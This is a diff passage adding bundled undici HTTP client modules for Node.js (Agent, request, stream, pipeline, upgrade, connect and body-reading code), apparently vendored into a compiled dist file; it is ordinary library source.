+module.exports.MockPool = MockPool +module.exports.MockAgent = MockAgent +module.exports.mockErrors = mockErrors + + +/***/ }), + +/***/ 7890: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { InvalidArgumentError } = __nccwpck_require__(8045) +const { kClients, kRunning, kClose, kDestroy, kDispatch, kInterceptors } = __nccwpck_require__(2785) +const DispatcherBase = __nccwpck_require__(4839) +const Pool = __nccwpck_require__(4634) +const Client = __nccwpck_require__(3598) +const util = __nccwpck_require__(3983) +const createRedirectInterceptor = __nccwpck_require__(8861) +const { WeakRef, FinalizationRegistry } = __nccwpck_require__(6436)() + +const kOnConnect = Symbol('onConnect') +const kOnDisconnect = Symbol('onDisconnect') +const kOnConnectionError = Symbol('onConnectionError') +const kMaxRedirections = Symbol('maxRedirections') +const kOnDrain = Symbol('onDrain') +const kFactory = Symbol('factory') +const kFinalizer = Symbol('finalizer') +const kOptions = Symbol('options') + +function defaultFactory (origin, opts) { + return opts && opts.connections === 1 + ? new Client(origin, opts) + : new Pool(origin, opts) +} + +class Agent extends DispatcherBase { + constructor ({ factory = defaultFactory, maxRedirections = 0, connect, ...options } = {}) { + super() + + if (typeof factory !== 'function') { + throw new InvalidArgumentError('factory must be a function.') + } + + if (connect != null && typeof connect !== 'function' && typeof connect !== 'object') { + throw new InvalidArgumentError('connect must be a function or an object') + } + + if (!Number.isInteger(maxRedirections) || maxRedirections < 0) { + throw new InvalidArgumentError('maxRedirections must be a positive number') + } + + if (connect && typeof connect !== 'function') { + connect = { ...connect } + } + + this[kInterceptors] = options.interceptors && options.interceptors.Agent && Array.isArray(options.interceptors.Agent) + ? options.interceptors.Agent + : [createRedirectInterceptor({ maxRedirections })] + + this[kOptions] = { ...util.deepClone(options), connect } + this[kOptions].interceptors = options.interceptors + ? { ...options.interceptors } + : undefined + this[kMaxRedirections] = maxRedirections + this[kFactory] = factory + this[kClients] = new Map() + this[kFinalizer] = new FinalizationRegistry(/* istanbul ignore next: gc is undeterministic */ key => { + const ref = this[kClients].get(key) + if (ref !== undefined && ref.deref() === undefined) { + this[kClients].delete(key) + } + }) + + const agent = this + + this[kOnDrain] = (origin, targets) => { + agent.emit('drain', origin, [agent, ...targets]) + } + + this[kOnConnect] = (origin, targets) => { + agent.emit('connect', origin, [agent, ...targets]) + } + + this[kOnDisconnect] = (origin, targets, err) => { + agent.emit('disconnect', origin, [agent, ...targets], err) + } + + this[kOnConnectionError] = (origin, targets, err) => { + agent.emit('connectionError', origin, [agent, ...targets], err) + } + } + + get [kRunning] () { + let ret = 0 + for (const ref of this[kClients].values()) { + const client = ref.deref() + /* istanbul ignore next: gc is undeterministic */ + if (client) { + ret += client[kRunning] + } + } + return ret + } + + [kDispatch] (opts, handler) { + let key + if (opts.origin && (typeof opts.origin === 'string' || opts.origin instanceof URL)) { + key = String(opts.origin) + } else { + throw new InvalidArgumentError('opts.origin must be a non-empty string or URL.') + } + + const ref = this[kClients].get(key) + + let dispatcher = ref ? ref.deref() : null + if (!dispatcher) { + dispatcher = this[kFactory](opts.origin, this[kOptions]) + .on('drain', this[kOnDrain]) + .on('connect', this[kOnConnect]) + .on('disconnect', this[kOnDisconnect]) + .on('connectionError', this[kOnConnectionError]) + + this[kClients].set(key, new WeakRef(dispatcher)) + this[kFinalizer].register(dispatcher, key) + } + + return dispatcher.dispatch(opts, handler) + } + + async [kClose] () { + const closePromises = [] + for (const ref of this[kClients].values()) { + const client = ref.deref() + /* istanbul ignore else: gc is undeterministic */ + if (client) { + closePromises.push(client.close()) + } + } + + await Promise.all(closePromises) + } + + async [kDestroy] (err) { + const destroyPromises = [] + for (const ref of this[kClients].values()) { + const client = ref.deref() + /* istanbul ignore else: gc is undeterministic */ + if (client) { + destroyPromises.push(client.destroy(err)) + } + } + + await Promise.all(destroyPromises) + } +} + +module.exports = Agent + + +/***/ }), + +/***/ 7032: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +const { addAbortListener } = __nccwpck_require__(3983) +const { RequestAbortedError } = __nccwpck_require__(8045) + +const kListener = Symbol('kListener') +const kSignal = Symbol('kSignal') + +function abort (self) { + if (self.abort) { + self.abort() + } else { + self.onError(new RequestAbortedError()) + } +} + +function addSignal (self, signal) { + self[kSignal] = null + self[kListener] = null + + if (!signal) { + return + } + + if (signal.aborted) { + abort(self) + return + } + + self[kSignal] = signal + self[kListener] = () => { + abort(self) + } + + addAbortListener(self[kSignal], self[kListener]) +} + +function removeSignal (self) { + if (!self[kSignal]) { + return + } + + if ('removeEventListener' in self[kSignal]) { + self[kSignal].removeEventListener('abort', self[kListener]) + } else { + self[kSignal].removeListener('abort', self[kListener]) + } + + self[kSignal] = null + self[kListener] = null +} + +module.exports = { + addSignal, + removeSignal +} + + +/***/ }), + +/***/ 9744: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { AsyncResource } = __nccwpck_require__(852) +const { InvalidArgumentError, RequestAbortedError, SocketError } = __nccwpck_require__(8045) +const util = __nccwpck_require__(3983) +const { addSignal, removeSignal } = __nccwpck_require__(7032) + +class ConnectHandler extends AsyncResource { + constructor (opts, callback) { + if (!opts || typeof opts !== 'object') { + throw new InvalidArgumentError('invalid opts') + } + + if (typeof callback !== 'function') { + throw new InvalidArgumentError('invalid callback') + } + + const { signal, opaque, responseHeaders } = opts + + if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { + throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') + } + + super('UNDICI_CONNECT') + + this.opaque = opaque || null + this.responseHeaders = responseHeaders || null + this.callback = callback + this.abort = null + + addSignal(this, signal) + } + + onConnect (abort, context) { + if (!this.callback) { + throw new RequestAbortedError() + } + + this.abort = abort + this.context = context + } + + onHeaders () { + throw new SocketError('bad connect', null) + } + + onUpgrade (statusCode, rawHeaders, socket) { + const { callback, opaque, context } = this + + removeSignal(this) + + this.callback = null + + let headers = rawHeaders + // Indicates is an HTTP2Session + if (headers != null) { + headers = this.responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) + } + + this.runInAsyncScope(callback, null, null, { + statusCode, + headers, + socket, + opaque, + context + }) + } + + onError (err) { + const { callback, opaque } = this + + removeSignal(this) + + if (callback) { + this.callback = null + queueMicrotask(() => { + this.runInAsyncScope(callback, null, err, { opaque }) + }) + } + } +} + +function connect (opts, callback) { + if (callback === undefined) { + return new Promise((resolve, reject) => { + connect.call(this, opts, (err, data) => { + return err ? reject(err) : resolve(data) + }) + }) + } + + try { + const connectHandler = new ConnectHandler(opts, callback) + this.dispatch({ ...opts, method: 'CONNECT' }, connectHandler) + } catch (err) { + if (typeof callback !== 'function') { + throw err + } + const opaque = opts && opts.opaque + queueMicrotask(() => callback(err, { opaque })) + } +} + +module.exports = connect + + +/***/ }), + +/***/ 8752: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { + Readable, + Duplex, + PassThrough +} = __nccwpck_require__(2781) +const { + InvalidArgumentError, + InvalidReturnValueError, + RequestAbortedError +} = __nccwpck_require__(8045) +const util = __nccwpck_require__(3983) +const { AsyncResource } = __nccwpck_require__(852) +const { addSignal, removeSignal } = __nccwpck_require__(7032) +const assert = __nccwpck_require__(9491) + +const kResume = Symbol('resume') + +class PipelineRequest extends Readable { + constructor () { + super({ autoDestroy: true }) + + this[kResume] = null + } + + _read () { + const { [kResume]: resume } = this + + if (resume) { + this[kResume] = null + resume() + } + } + + _destroy (err, callback) { + this._read() + + callback(err) + } +} + +class PipelineResponse extends Readable { + constructor (resume) { + super({ autoDestroy: true }) + this[kResume] = resume + } + + _read () { + this[kResume]() + } + + _destroy (err, callback) { + if (!err && !this._readableState.endEmitted) { + err = new RequestAbortedError() + } + + callback(err) + } +} + +class PipelineHandler extends AsyncResource { + constructor (opts, handler) { + if (!opts || typeof opts !== 'object') { + throw new InvalidArgumentError('invalid opts') + } + + if (typeof handler !== 'function') { + throw new InvalidArgumentError('invalid handler') + } + + const { signal, method, opaque, onInfo, responseHeaders } = opts + + if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { + throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') + } + + if (method === 'CONNECT') { + throw new InvalidArgumentError('invalid method') + } + + if (onInfo && typeof onInfo !== 'function') { + throw new InvalidArgumentError('invalid onInfo callback') + } + + super('UNDICI_PIPELINE') + + this.opaque = opaque || null + this.responseHeaders = responseHeaders || null + this.handler = handler + this.abort = null + this.context = null + this.onInfo = onInfo || null + + this.req = new PipelineRequest().on('error', util.nop) + + this.ret = new Duplex({ + readableObjectMode: opts.objectMode, + autoDestroy: true, + read: () => { + const { body } = this + + if (body && body.resume) { + body.resume() + } + }, + write: (chunk, encoding, callback) => { + const { req } = this + + if (req.push(chunk, encoding) || req._readableState.destroyed) { + callback() + } else { + req[kResume] = callback + } + }, + destroy: (err, callback) => { + const { body, req, res, ret, abort } = this + + if (!err && !ret._readableState.endEmitted) { + err = new RequestAbortedError() + } + + if (abort && err) { + abort() + } + + util.destroy(body, err) + util.destroy(req, err) + util.destroy(res, err) + + removeSignal(this) + + callback(err) + } + }).on('prefinish', () => { + const { req } = this + + // Node < 15 does not call _final in same tick. + req.push(null) + }) + + this.res = null + + addSignal(this, signal) + } + + onConnect (abort, context) { + const { ret, res } = this + + assert(!res, 'pipeline cannot be retried') + + if (ret.destroyed) { + throw new RequestAbortedError() + } + + this.abort = abort + this.context = context + } + + onHeaders (statusCode, rawHeaders, resume) { + const { opaque, handler, context } = this + + if (statusCode < 200) { + if (this.onInfo) { + const headers = this.responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) + this.onInfo({ statusCode, headers }) + } + return + } + + this.res = new PipelineResponse(resume) + + let body + try { + this.handler = null + const headers = this.responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) + body = this.runInAsyncScope(handler, null, { + statusCode, + headers, + opaque, + body: this.res, + context + }) + } catch (err) { + this.res.on('error', util.nop) + throw err + } + + if (!body || typeof body.on !== 'function') { + throw new InvalidReturnValueError('expected Readable') + } + + body + .on('data', (chunk) => { + const { ret, body } = this + + if (!ret.push(chunk) && body.pause) { + body.pause() + } + }) + .on('error', (err) => { + const { ret } = this + + util.destroy(ret, err) + }) + .on('end', () => { + const { ret } = this + + ret.push(null) + }) + .on('close', () => { + const { ret } = this + + if (!ret._readableState.ended) { + util.destroy(ret, new RequestAbortedError()) + } + }) + + this.body = body + } + + onData (chunk) { + const { res } = this + return res.push(chunk) + } + + onComplete (trailers) { + const { res } = this + res.push(null) + } + + onError (err) { + const { ret } = this + this.handler = null + util.destroy(ret, err) + } +} + +function pipeline (opts, handler) { + try { + const pipelineHandler = new PipelineHandler(opts, handler) + this.dispatch({ ...opts, body: pipelineHandler.req }, pipelineHandler) + return pipelineHandler.ret + } catch (err) { + return new PassThrough().destroy(err) + } +} + +module.exports = pipeline + + +/***/ }), + +/***/ 5448: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const Readable = __nccwpck_require__(3858) +const { + InvalidArgumentError, + RequestAbortedError +} = __nccwpck_require__(8045) +const util = __nccwpck_require__(3983) +const { getResolveErrorBodyCallback } = __nccwpck_require__(7474) +const { AsyncResource } = __nccwpck_require__(852) +const { addSignal, removeSignal } = __nccwpck_require__(7032) + +class RequestHandler extends AsyncResource { + constructor (opts, callback) { + if (!opts || typeof opts !== 'object') { + throw new InvalidArgumentError('invalid opts') + } + + const { signal, method, opaque, body, onInfo, responseHeaders, throwOnError, highWaterMark } = opts + + try { + if (typeof callback !== 'function') { + throw new InvalidArgumentError('invalid callback') + } + + if (highWaterMark && (typeof highWaterMark !== 'number' || highWaterMark < 0)) { + throw new InvalidArgumentError('invalid highWaterMark') + } + + if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { + throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') + } + + if (method === 'CONNECT') { + throw new InvalidArgumentError('invalid method') + } + + if (onInfo && typeof onInfo !== 'function') { + throw new InvalidArgumentError('invalid onInfo callback') + } + + super('UNDICI_REQUEST') + } catch (err) { + if (util.isStream(body)) { + util.destroy(body.on('error', util.nop), err) + } + throw err + } + + this.responseHeaders = responseHeaders || null + this.opaque = opaque || null + this.callback = callback + this.res = null + this.abort = null + this.body = body + this.trailers = {} + this.context = null + this.onInfo = onInfo || null + this.throwOnError = throwOnError + this.highWaterMark = highWaterMark + + if (util.isStream(body)) { + body.on('error', (err) => { + this.onError(err) + }) + } + + addSignal(this, signal) + } + + onConnect (abort, context) { + if (!this.callback) { + throw new RequestAbortedError() + } + + this.abort = abort + this.context = context + } + + onHeaders (statusCode, rawHeaders, resume, statusMessage) { + const { callback, opaque, abort, context, responseHeaders, highWaterMark } = this + + const headers = responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) + + if (statusCode < 200) { + if (this.onInfo) { + this.onInfo({ statusCode, headers }) + } + return + } + + const parsedHeaders = responseHeaders === 'raw' ? util.parseHeaders(rawHeaders) : headers + const contentType = parsedHeaders['content-type'] + const body = new Readable({ resume, abort, contentType, highWaterMark }) + + this.callback = null + this.res = body + if (callback !== null) { + if (this.throwOnError && statusCode >= 400) { + this.runInAsyncScope(getResolveErrorBodyCallback, null, + { callback, body, contentType, statusCode, statusMessage, headers } + ) + } else { + this.runInAsyncScope(callback, null, null, { + statusCode, + headers, + trailers: this.trailers, + opaque, + body, + context + }) + } + } + } + + onData (chunk) { + const { res } = this + return res.push(chunk) + } + + onComplete (trailers) { + const { res } = this + + removeSignal(this) + + util.parseHeaders(trailers, this.trailers) + + res.push(null) + } + + onError (err) { + const { res, callback, body, opaque } = this + + removeSignal(this) + + if (callback) { + // TODO: Does this need queueMicrotask? + this.callback = null + queueMicrotask(() => { + this.runInAsyncScope(callback, null, err, { opaque }) + }) + } + + if (res) { + this.res = null + // Ensure all queued handlers are invoked before destroying res. + queueMicrotask(() => { + util.destroy(res, err) + }) + } + + if (body) { + this.body = null + util.destroy(body, err) + } + } +} + +function request (opts, callback) { + if (callback === undefined) { + return new Promise((resolve, reject) => { + request.call(this, opts, (err, data) => { + return err ? reject(err) : resolve(data) + }) + }) + } + + try { + this.dispatch(opts, new RequestHandler(opts, callback)) + } catch (err) { + if (typeof callback !== 'function') { + throw err + } + const opaque = opts && opts.opaque + queueMicrotask(() => callback(err, { opaque })) + } +} + +module.exports = request +module.exports.RequestHandler = RequestHandler + + +/***/ }), + +/***/ 5395: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { finished, PassThrough } = __nccwpck_require__(2781) +const { + InvalidArgumentError, + InvalidReturnValueError, + RequestAbortedError +} = __nccwpck_require__(8045) +const util = __nccwpck_require__(3983) +const { getResolveErrorBodyCallback } = __nccwpck_require__(7474) +const { AsyncResource } = __nccwpck_require__(852) +const { addSignal, removeSignal } = __nccwpck_require__(7032) + +class StreamHandler extends AsyncResource { + constructor (opts, factory, callback) { + if (!opts || typeof opts !== 'object') { + throw new InvalidArgumentError('invalid opts') + } + + const { signal, method, opaque, body, onInfo, responseHeaders, throwOnError } = opts + + try { + if (typeof callback !== 'function') { + throw new InvalidArgumentError('invalid callback') + } + + if (typeof factory !== 'function') { + throw new InvalidArgumentError('invalid factory') + } + + if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { + throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') + } + + if (method === 'CONNECT') { + throw new InvalidArgumentError('invalid method') + } + + if (onInfo && typeof onInfo !== 'function') { + throw new InvalidArgumentError('invalid onInfo callback') + } + + super('UNDICI_STREAM') + } catch (err) { + if (util.isStream(body)) { + util.destroy(body.on('error', util.nop), err) + } + throw err + } + + this.responseHeaders = responseHeaders || null + this.opaque = opaque || null + this.factory = factory + this.callback = callback + this.res = null + this.abort = null + this.context = null + this.trailers = null + this.body = body + this.onInfo = onInfo || null + this.throwOnError = throwOnError || false + + if (util.isStream(body)) { + body.on('error', (err) => { + this.onError(err) + }) + } + + addSignal(this, signal) + } + + onConnect (abort, context) { + if (!this.callback) { + throw new RequestAbortedError() + } + + this.abort = abort + this.context = context + } + + onHeaders (statusCode, rawHeaders, resume, statusMessage) { + const { factory, opaque, context, callback, responseHeaders } = this + + const headers = responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) + + if (statusCode < 200) { + if (this.onInfo) { + this.onInfo({ statusCode, headers }) + } + return + } + + this.factory = null + + let res + + if (this.throwOnError && statusCode >= 400) { + const parsedHeaders = responseHeaders === 'raw' ? util.parseHeaders(rawHeaders) : headers + const contentType = parsedHeaders['content-type'] + res = new PassThrough() + + this.callback = null + this.runInAsyncScope(getResolveErrorBodyCallback, null, + { callback, body: res, contentType, statusCode, statusMessage, headers } + ) + } else { + if (factory === null) { + return + } + + res = this.runInAsyncScope(factory, null, { + statusCode, + headers, + opaque, + context + }) + + if ( + !res || + typeof res.write !== 'function' || + typeof res.end !== 'function' || + typeof res.on !== 'function' + ) { + throw new InvalidReturnValueError('expected Writable') + } + + // TODO: Avoid finished. It registers an unnecessary amount of listeners. + finished(res, { readable: false }, (err) => { + const { callback, res, opaque, trailers, abort } = this + + this.res = null + if (err || !res.readable) { + util.destroy(res, err) + } + + this.callback = null + this.runInAsyncScope(callback, null, err || null, { opaque, trailers }) + + if (err) { + abort() + } + }) + } + + res.on('drain', resume) + + this.res = res + + const needDrain = res.writableNeedDrain !== undefined + ? res.writableNeedDrain + : res._writableState && res._writableState.needDrain + + return needDrain !== true + } + + onData (chunk) { + const { res } = this + + return res ? res.write(chunk) : true + } + + onComplete (trailers) { + const { res } = this + + removeSignal(this) + + if (!res) { + return + } + + this.trailers = util.parseHeaders(trailers) + + res.end() + } + + onError (err) { + const { res, callback, opaque, body } = this + + removeSignal(this) + + this.factory = null + + if (res) { + this.res = null + util.destroy(res, err) + } else if (callback) { + this.callback = null + queueMicrotask(() => { + this.runInAsyncScope(callback, null, err, { opaque }) + }) + } + + if (body) { + this.body = null + util.destroy(body, err) + } + } +} + +function stream (opts, factory, callback) { + if (callback === undefined) { + return new Promise((resolve, reject) => { + stream.call(this, opts, factory, (err, data) => { + return err ? reject(err) : resolve(data) + }) + }) + } + + try { + this.dispatch(opts, new StreamHandler(opts, factory, callback)) + } catch (err) { + if (typeof callback !== 'function') { + throw err + } + const opaque = opts && opts.opaque + queueMicrotask(() => callback(err, { opaque })) + } +} + +module.exports = stream + + +/***/ }), + +/***/ 6923: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { InvalidArgumentError, RequestAbortedError, SocketError } = __nccwpck_require__(8045) +const { AsyncResource } = __nccwpck_require__(852) +const util = __nccwpck_require__(3983) +const { addSignal, removeSignal } = __nccwpck_require__(7032) +const assert = __nccwpck_require__(9491) + +class UpgradeHandler extends AsyncResource { + constructor (opts, callback) { + if (!opts || typeof opts !== 'object') { + throw new InvalidArgumentError('invalid opts') + } + + if (typeof callback !== 'function') { + throw new InvalidArgumentError('invalid callback') + } + + const { signal, opaque, responseHeaders } = opts + + if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { + throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') + } + + super('UNDICI_UPGRADE') + + this.responseHeaders = responseHeaders || null + this.opaque = opaque || null + this.callback = callback + this.abort = null + this.context = null + + addSignal(this, signal) + } + + onConnect (abort, context) { + if (!this.callback) { + throw new RequestAbortedError() + } + + this.abort = abort + this.context = null + } + + onHeaders () { + throw new SocketError('bad upgrade', null) + } + + onUpgrade (statusCode, rawHeaders, socket) { + const { callback, opaque, context } = this + + assert.strictEqual(statusCode, 101) + + removeSignal(this) + + this.callback = null + const headers = this.responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) + this.runInAsyncScope(callback, null, null, { + headers, + socket, + opaque, + context + }) + } + + onError (err) { + const { callback, opaque } = this + + removeSignal(this) + + if (callback) { + this.callback = null + queueMicrotask(() => { + this.runInAsyncScope(callback, null, err, { opaque }) + }) + } + } +} + +function upgrade (opts, callback) { + if (callback === undefined) { + return new Promise((resolve, reject) => { + upgrade.call(this, opts, (err, data) => { + return err ? reject(err) : resolve(data) + }) + }) + } + + try { + const upgradeHandler = new UpgradeHandler(opts, callback) + this.dispatch({ + ...opts, + method: opts.method || 'GET', + upgrade: opts.protocol || 'Websocket' + }, upgradeHandler) + } catch (err) { + if (typeof callback !== 'function') { + throw err + } + const opaque = opts && opts.opaque + queueMicrotask(() => callback(err, { opaque })) + } +} + +module.exports = upgrade + + +/***/ }), + +/***/ 4059: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +module.exports.request = __nccwpck_require__(5448) +module.exports.stream = __nccwpck_require__(5395) +module.exports.pipeline = __nccwpck_require__(8752) +module.exports.upgrade = __nccwpck_require__(6923) +module.exports.connect = __nccwpck_require__(9744) + + +/***/ }), + +/***/ 3858: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; +// Ported from https://github.com/nodejs/undici/pull/907 + + + +const assert = __nccwpck_require__(9491) +const { Readable } = __nccwpck_require__(2781) +const { RequestAbortedError, NotSupportedError, InvalidArgumentError } = __nccwpck_require__(8045) +const util = __nccwpck_require__(3983) +const { ReadableStreamFrom, toUSVString } = __nccwpck_require__(3983) + +let Blob + +const kConsume = Symbol('kConsume') +const kReading = Symbol('kReading') +const kBody = Symbol('kBody') +const kAbort = Symbol('abort') +const kContentType = Symbol('kContentType') + +const noop = () => {} + +module.exports = class BodyReadable extends Readable { + constructor ({ + resume, + abort, + contentType = '', + highWaterMark = 64 * 1024 // Same as nodejs fs streams. + }) { + super({ + autoDestroy: true, + read: resume, + highWaterMark + }) + + this._readableState.dataEmitted = false + + this[kAbort] = abort + this[kConsume] = null + this[kBody] = null + this[kContentType] = contentType + + // Is stream being consumed through Readable API? + // This is an optimization so that we avoid checking + // for 'data' and 'readable' listeners in the hot path + // inside push(). + this[kReading] = false + } + + destroy (err) { + if (this.destroyed) { + // Node < 16 + return this + } + + if (!err && !this._readableState.endEmitted) { + err = new RequestAbortedError() + } + + if (err) { + this[kAbort]() + } + + return super.destroy(err) + } + + emit (ev, ...args) { + if (ev === 'data') { + // Node < 16.7 + this._readableState.dataEmitted = true + } else if (ev === 'error') { + // Node < 16 + this._readableState.errorEmitted = true + } + return super.emit(ev, ...args) + } + + on (ev, ...args) { + if (ev === 'data' || ev === 'readable') { + this[kReading] = true + } + return super.on(ev, ...args) + } + + addListener (ev, ...args) { + return this.on(ev, ...args) + } + + off (ev, ...args) { + const ret = super.off(ev, ...args) + if (ev === 'data' || ev === 'readable') { + this[kReading] = ( + this.listenerCount('data') > 0 || + this.listenerCount('readable') > 0 + ) + } + return ret + } + + removeListener (ev, ...args) { + return this.off(ev, ...args) + } + + push (chunk) { + if (this[kConsume] && chunk !== null && this.readableLength === 0) { + consumePush(this[kConsume], chunk) + return this[kReading] ? super.push(chunk) : true + } + return super.push(chunk) + } + + // https://fetch.spec.whatwg.org/#dom-body-text + async text () { + return consume(this, 'text') + } + + // https://fetch.spec.whatwg.org/#dom-body-json + async json () { + return consume(this, 'json') + } + + // https://fetch.spec.whatwg.org/#dom-body-blob + async blob () { + return consume(this, 'blob') + } + + // https://fetch.spec.whatwg.org/#dom-body-arraybuffer + async arrayBuffer () { + return consume(this, 'arrayBuffer') + } + + // https://fetch.spec.whatwg.org/#dom-body-formdata + async formData () { + // TODO: Implement. + throw new NotSupportedError() + } + + // https://fetch.spec.whatwg.org/#dom-body-bodyused + get bodyUsed () { + return util.isDisturbed(this) + } + + // https://fetch.spec.whatwg.org/#dom-body-body + get body () { + if (!this[kBody]) { + this[kBody] = ReadableStreamFrom(this) + if (this[kConsume]) { + // TODO: Is this the best way to force a lock? + this[kBody].getReader() // Ensure stream is locked. + assert(this[kBody].locked) + } + } + return this[kBody] + } + + dump (opts) { + let limit = opts && Number.isFinite(opts.limit) ? opts.limit : 262144 + const signal = opts && opts.signal + + if (signal) { + try { + if (typeof signal !== 'object' || !('aborted' in signal)) { + throw new InvalidArgumentError('signal must be an AbortSignal') + } + util.throwIfAborted(signal) + } catch (err) { + return Promise.reject(err) + } + } + + if (this.closed) { + return Promise.resolve(null) + } + + return new Promise((resolve, reject) => { + const signalListenerCleanup = signal + ? util.addAbortListener(signal, () => { + this.destroy() + }) + : noop + + this + .on('close', function () { + signalListenerCleanup() + if (signal && signal.aborted) { + reject(signal.reason || Object.assign(new Error('The operation was aborted'), { name: 'AbortError' })) + } else { + resolve(null) + } + }) + .on('error', noop) + .on('data', function (chunk) { + limit -= chunk.length + if (limit <= 0) { + this.destroy() + } + }) + .resume() + }) + } +} + +// https://streams.spec.whatwg.org/#readablestream-locked +function isLocked (self) { + // Consume is an implicit lock. + return (self[kBody] && self[kBody].locked === true) || self[kConsume] +} + +// https://fetch.spec.whatwg.org/#body-unusable +function isUnusable (self) { + return util.isDisturbed(self) || isLocked(self) +} + +async function consume (stream, type) { + if (isUnusable(stream)) { + throw new TypeError('unusable') + } + + assert(!stream[kConsume]) + + return new Promise((resolve, reject) => { + stream[kConsume] = { + type, + stream, + resolve, + reject, + length: 0, + body: [] + } + + stream + .on('error', function (err) { + consumeFinish(this[kConsume], err) + }) + .on('close', function () { + if (this[kConsume].body !== null) { + consumeFinish(this[kConsume], new RequestAbortedError()) + } + }) + + process.nextTick(consumeStart, stream[kConsume]) + }) +} + +function consumeStart (consume) { + if (consume.body === null) { + return + } + + const { _readableState: state } = consume.stream + + for (const chunk of state.buffer) { + consumePush(consume, chunk) + } + + if (state.endEmitted) { + consumeEnd(this[kConsume]) + } else { + consume.stream.on('end', function () { + consumeEnd(this[kConsume]) + }) + } + + consume.stream.resume() + + while (consume.stream.read() != null) { + // Loop + } +} + +function consumeEnd (consume) { + const { type, body, resolve, stream, length } = consume + + try { + if (type === 'text') { + resolve(toUSVString(Buffer.concat(body))) + } else if (type === 'json') { + resolve(JSON.parse(Buffer.concat(body))) + } else if (type === 'arrayBuffer') { + const dst = new Uint8Array(length) + + let pos = 0 + for (const buf of body) { + dst.set(buf, pos) + pos += buf.byteLength + } + + resolve(dst.buffer) + } else if (type === 'blob') { + if (!Blob) { + Blob = (__nccwpck_require__(4300).Blob) + } + resolve(new Blob(body, { type: stream[kContentType] })) + } + + consumeFinish(consume) + } catch (err) { + stream.destroy(err) + } +} + +function consumePush (consume, chunk) { + consume.length += chunk.length + consume.body.push(chunk) +} + +function consumeFinish (consume, err) { + if (consume.body === null) { + return + } + + if (err) { + consume.reject(err) + } else { + consume.resolve() + } + + consume.type = null + consume.stream = null + consume.resolve = null + consume.reject = null + consume.length = 0 + consume.body = null +} + + +/***/ }), + +/***/ 7474: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +const assert = __nccwpck_require__(9491) +const { + ResponseStatusCodeError +} = __nccwpck_require__(8045) +const { toUSVString } = __nccwpck_require__(3983) + +async function getResolveErrorBodyCallback ({ callback, body, contentType, statusCode, statusMessage, headers }) { + assert(body) + + let chunks = [] + let limit = 0 + + for await (const chunk of body) { + chunks.push(chunk) + limit += chunk.length + if (limit > 128 * 1024) { + chunks = null + break + } + } + + if (statusCode === 204 || !contentType || !chunks) { + process.nextTick(callback, new ResponseStatusCodeError(`Response status code ${statusCode}${statusMessage ? `: ${statusMessage}` : ''}`, statusCode, headers)) + return + } + + try { + if (contentType.startsWith('application/json')) { + const payload = JSON.parse(toUSVString(Buffer.concat(chunks))) + process.nextTick(callback, new ResponseStatusCodeError(`Response status code ${statusCode}${statusMessage ? `: ${statusMessage}` : ''}`, statusCode, headers, payload)) + return + } + + if (contentType.startsWith('text/')) { + const payload = toUSVString(Buffer.concat(chunks)) + process.nextTick(callback, new ResponseStatusCodeError(`Response status code ${statusCode}${statusMessage ? `: ${statusMessage}` : ''}`, statusCode, headers, payload)) + return + } + } catch (err) { + // Process in a fallback if error + } + + process.nextTick(callback, new ResponseStatusCodeError(`Response status code ${statusCode}${statusMessage ? `: ${statusMessage}` : ''}`, statusCode, headers)) +} + +module.exports = { getResolveErrorBodyCallback } + + +/***/ }), + +/***/ 7931: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { + BalancedPoolMissingUpstreamError, + InvalidArgumentError +} = __nccwpck_require__(8045) +const { + PoolBase, + kClients, + kNeedDrain, + kAddClient, + kRemoveClient, + kGetDispatcher +} = __nccwpck_require__(3198) +const Pool = __nccwpck_require__(4634) +const { kUrl, kInterceptors } = __nccwpck_require__(2785) +const { parseOrigin } = __nccwpck_require__(3983) +const kFactory = Symbol('factory') + +const kOptions = Symbol('options') +const kGreatestCommonDivisor = Symbol('kGreatestCommonDivisor') +const kCurrentWeight = Symbol('kCurrentWeight') +const kIndex = Symbol('kIndex') +const kWeight = Symbol('kWeight') +const kMaxWeightPerServer = Symbol('kMaxWeightPerServer') +const kErrorPenalty = Symbol('kErrorPenalty') + +function getGreatestCommonDivisor (a, b) { + if (b === 0) return a + return getGreatestCommonDivisor(b, a % b) +} + +function defaultFactory (origin, opts) { + return new Pool(origin, opts) +} + +class BalancedPool extends PoolBase { + constructor (upstreams = [], { factory = defaultFactory, ...opts } = {}) { + super() + + this[kOptions] = opts + this[kIndex] = -1 + this[kCurrentWeight] = 0 + + this[kMaxWeightPerServer] = this[kOptions].maxWeightPerServer || 100 + this[kErrorPenalty] = this[kOptions].errorPenalty || 15 + + if (!Array.isArray(upstreams)) { + upstreams = [upstreams] + } + + if 